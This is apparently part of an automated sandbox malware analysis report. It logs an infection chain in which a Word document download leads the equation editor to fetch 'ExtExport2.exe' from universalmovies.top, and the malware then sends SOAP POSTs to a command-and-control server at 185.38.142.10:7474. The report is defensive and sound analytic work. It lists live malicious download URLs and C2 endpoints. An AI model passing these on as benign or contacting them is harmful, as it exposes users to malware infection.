                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49172
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49172
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49172
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49172
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49172
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49172
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49172
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49172
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
                  Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49173
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443

                  Networking

                  barindex
                  Source: Malware configuration extractorURLs: 185.38.142.10:7474
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49176 -> 7474
                  Source: unknownNetwork traffic detected: HTTP traffic on port 7474 -> 49176
                  Source: unknownNetwork traffic detected: HTTP traffic on port 7474 -> 49176
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49176 -> 7474
                  Source: unknownNetwork traffic detected: HTTP traffic on port 7474 -> 49176
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49178 -> 7474
                  Source: unknownNetwork traffic detected: HTTP traffic on port 7474 -> 49178
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49179 -> 7474
                  Source: unknownNetwork traffic detected: HTTP traffic on port 7474 -> 49178
                  Source: unknownNetwork traffic detected: HTTP traffic on port 7474 -> 49179
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 185.38.142.10:7474
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 185.38.142.10:7474Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"Host: 185.38.142.10:7474Content-Length: 144Expect: 100-continueAccept-Encoding: gzip, deflate
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"Host: 185.38.142.10:7474Content-Length: 208913Expect: 100-continueAccept-Encoding: gzip, deflate
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"Host: 185.38.142.10:7474Content-Length: 208905Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
                  Source: Joe Sandbox ViewIP Address: 172.67.162.95 172.67.162.95
                  Source: Joe Sandbox ViewIP Address: 104.21.74.191 104.21.74.191
                  Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                  Source: Joe Sandbox ViewASN Name: NETSOLUTIONSNL NETSOLUTIONSNL
                  Source: Joe Sandbox ViewJA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
                  Source: Joe Sandbox ViewJA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
                  Source: global trafficHTTP traffic detected: GET /notorious.doc HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: universalmovies.topConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /ExtExport2.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: universalmovies.topConnection: Keep-Alive
                  Source: unknownHTTPS traffic detected: 172.67.162.95:443 -> 192.168.2.22:49167 version: TLS 1.0
                  Source: unknownHTTPS traffic detected: 172.67.162.95:443 -> 192.168.2.22:49168 version: TLS 1.0
                  Source: unknownHTTPS traffic detected: 172.67.162.95:443 -> 192.168.2.22:49169 version: TLS 1.0
                  Source: unknownHTTPS traffic detected: 104.21.74.191:443 -> 192.168.2.22:49170 version: TLS 1.0
                  Source: unknownHTTPS traffic detected: 172.67.162.95:443 -> 192.168.2.22:49174 version: TLS 1.0
                  Source: unknownHTTPS traffic detected: 104.21.74.191:443 -> 192.168.2.22:49175 version: TLS 1.0
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.38.142.10
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.38.142.10
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.38.142.10
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.38.142.10
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.38.142.10
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.38.142.10
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.38.142.10
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.38.142.10
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.38.142.10
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.38.142.10
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.38.142.10
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.38.142.10
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.38.142.10
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.38.142.10
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.38.142.10
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.38.142.10
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.38.142.10
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.38.142.10
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.38.142.10
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.38.142.10
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.38.142.10
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.38.142.10
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.38.142.10
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.38.142.10
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.38.142.10
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.38.142.10
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.38.142.10
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.38.142.10
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.38.142.10
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.38.142.10
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.38.142.10
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.38.142.10
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.38.142.10
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.38.142.10
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.38.142.10
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.38.142.10
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.38.142.10
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.38.142.10
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.38.142.10
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.38.142.10
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.38.142.10
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.38.142.10
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.38.142.10
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.38.142.10
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.38.142.10
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.38.142.10
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.38.142.10
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.38.142.10
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.38.142.10
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.38.142.10
                  Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 10_2_002A25E2 InternetReadFile,InternetQueryDataAvailable,InternetReadFile,10_2_002A25E2
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{81A7FC9E-402C-4864-9B60-D1B944C96BBB}.tmpJump to behavior
                  Source: global trafficHTTP traffic detected: GET /notorious.doc HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: universalmovies.topConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /ExtExport2.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: universalmovies.topConnection: Keep-Alive
                  Source: EQNEDT32.EXE, 00000009.00000003.391274570.00000000005F1000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000009.00000002.391551132.00000000005F8000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.439171465.00000000008A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
                  Source: global trafficDNS traffic detected: DNS query: universalmovies.top
                  Source: global trafficDNS traffic detected: DNS query: api.ip.sb
                  Source: unknownHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 185.38.142.10:7474Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
                  Source: EQNEDT32.EXE, 00000009.00000003.391274570.00000000005F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Https://universalmovies.top/ExtExport2.exeLMEMX
                  Source: RegSvcs.exe, 0000000C.00000002.439295292.0000000002493000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.439295292.0000000002353000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.439295292.00000000020A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.38.142.10:7474
                  Source: RegSvcs.exe, 0000000C.00000002.439295292.00000000020A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.38.142.10:7474/
                  Source: RegSvcs.exe, 0000000C.00000002.439295292.0000000002493000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.38.142.10:7474t-
                  Source: EQNEDT32.EXE, 00000009.00000003.391274570.00000000005F1000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000009.00000002.391551132.00000000005F8000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.439171465.00000000008DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
                  Source: EQNEDT32.EXE, 00000009.00000003.391274570.00000000005F1000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000009.00000002.391505550.00000000005C3000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000009.00000002.391551132.00000000005F8000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000009.00000003.391282505.00000000005C3000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.439171465.00000000008A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
                  Source: EQNEDT32.EXE, 00000009.00000003.391274570.00000000005F1000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000009.00000002.391551132.00000000005F8000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.439171465.00000000008A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
                  Source: EQNEDT32.EXE, 00000009.00000003.391274570.00000000005F1000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000009.00000002.391505550.00000000005C3000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000009.00000002.391551132.00000000005F8000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000009.00000003.391282505.00000000005C3000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.439171465.00000000008A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
                  Source: EQNEDT32.EXE, 00000009.00000003.391274570.00000000005F1000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000009.00000002.391551132.00000000005F8000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.439171465.00000000008DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                  Source: EQNEDT32.EXE, 00000009.00000002.391505550.00000000005C3000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000009.00000003.391282505.00000000005C3000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.439171465.00000000008A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
                  Source: EQNEDT32.EXE, 00000009.00000003.391274570.00000000005F1000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000009.00000002.391505550.00000000005C3000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000009.00000002.391551132.00000000005F8000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000009.00000003.391282505.00000000005C3000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.439171465.00000000008A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
                  Source: RegSvcs.exe, 0000000C.00000002.439054948.0000000000037000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ns.adobe.
                  Source: RegSvcs.exe, 0000000C.00000002.439977247.0000000004C8D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ns.adobe.c/s
                  Source: EQNEDT32.EXE, 00000009.00000003.391274570.00000000005F1000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000009.00000002.391505550.00000000005C3000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000009.00000002.391551132.00000000005F8000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000009.00000003.391282505.00000000005C3000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.439171465.00000000008A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                  Source: EQNEDT32.EXE, 00000009.00000002.391505550.00000000005C3000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000009.00000003.391282505.00000000005C3000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.439171465.00000000008A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
                  Source: EQNEDT32.EXE, 00000009.00000003.391274570.00000000005F1000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000009.00000002.391551132.00000000005F8000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.439171465.00000000008A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
                  Source: EQNEDT32.EXE, 00000009.00000003.391274570.00000000005F1000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000009.00000002.391505550.00000000005C3000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000009.00000002.391551132.00000000005F8000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000009.00000003.391282505.00000000005C3000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.439171465.00000000008A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
                  Source: EQNEDT32.EXE, 00000009.00000002.391505550.00000000005C3000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000009.00000003.391282505.00000000005C3000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.439171465.00000000008A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com05
                  Source: EQNEDT32.EXE, 00000009.00000003.391274570.00000000005F1000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000009.00000002.391505550.00000000005C3000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000009.00000002.391551132.00000000005F8000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000009.00000003.391282505.00000000005C3000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.439171465.00000000008A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net03
                  Source: EQNEDT32.EXE, 00000009.00000003.391274570.00000000005F1000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000009.00000002.391551132.00000000005F8000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.439171465.00000000008A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net0D
                  Source: RegSvcs.exe, 0000000C.00000002.439295292.0000000002353000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/
                  Source: RegSvcs.exe, 0000000C.00000002.439295292.00000000020A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
                  Source: RegSvcs.exe, 0000000C.00000002.439295292.00000000020F0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                  Source: RegSvcs.exe, 0000000C.00000002.439295292.00000000020A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
                  Source: RegSvcs.exe, 0000000C.00000002.439295292.00000000020A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/fault
                  Source: RegSvcs.exe, 0000000C.00000002.439295292.00000000020A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
                  Source: RegSvcs.exe, 0000000C.00000002.439295292.00000000020A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: RegSvcs.exe, 0000000C.00000002.439295292.00000000020F0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/
                  Source: RegSvcs.exe, 0000000C.00000002.439295292.00000000020A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/CheckConnect
                  Source: RegSvcs.exe, 0000000C.00000002.439295292.00000000020A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/CheckConnectResponse
                  Source: RegSvcs.exe, 0000000C.00000002.439295292.00000000020A1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.439295292.00000000020F0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/EnvironmentSettings
                  Source: RegSvcs.exe, 0000000C.00000002.439295292.00000000020A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/EnvironmentSettingsResponse
                  Source: RegSvcs.exe, 0000000C.00000002.439295292.0000000002493000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.439295292.00000000020A1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.439295292.00000000020F0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/GetUpdates
                  Source: RegSvcs.exe, 0000000C.00000002.439295292.00000000020A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/GetUpdatesResponse
                  Source: RegSvcs.exe, 0000000C.00000002.439295292.0000000002353000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.439295292.00000000020A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/SetEnvironment
                  Source: RegSvcs.exe, 0000000C.00000002.439295292.00000000020A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/SetEnvironmentResponse
                  Source: RegSvcs.exe, 0000000C.00000002.439295292.00000000020A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdate
                  Source: RegSvcs.exe, 0000000C.00000002.439295292.00000000020A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdateResponse
                  Source: RegSvcs.exe, 0000000C.00000002.439295292.0000000002493000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/x
                  Source: EQNEDT32.EXE, 00000009.00000003.391274570.00000000005F1000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000009.00000002.391551132.00000000005F8000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.439171465.00000000008A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
